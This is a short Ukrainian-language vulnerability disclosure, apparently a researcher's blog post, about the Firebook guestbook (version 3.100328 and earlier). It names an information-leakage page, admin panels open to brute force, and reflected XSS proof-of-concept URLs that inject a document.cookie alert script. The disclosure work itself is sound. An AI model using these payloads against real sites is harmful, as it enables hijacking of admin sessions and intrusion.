Численні уразливості в Firebook
16:00 10.02.201127.11.2010
У травні, 24.05.2010, а також додатково 25.11.2010, я знайшов Information Leakage, Brute Force та Cross-Site Scripting уразливості в Firebook. Це гостьова книга. Дані уразливості я виявив на різних сайтах, в тому числі на офіційному сайті firebook.ru. Про що найближчим часом повідомлю розробникам.
Раніше я вже писав про уразливості в Firebook.
Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.
10.02.2011
Information Leakage:
http://site/cgi-bin/firebook/firebook.cgi
На сторінці є розділ SystemInfo з Full path disclosure та іменами txt-файлів БД веб додатку.
Brute Force:
http://site/path_to_firebook_admin/ (скрита адмінка)
http://site/admin/index.html?account=in (публічна адмінка)
XSS:
http://site/path_to_firebook_admin/?Name=%3Cscript%3Ealert(document.cookie)%3C/script%3E&Word=1&PutWord=1 (скрита адмінка)
http://site/admin/index.html?NAME=%3Cscript%3Ealert(document.cookie)%3C/script%3E&PASS=1&action=AccountIn (публічна адмінка)
Уразливі Firebook 3.100328 та попередні версії.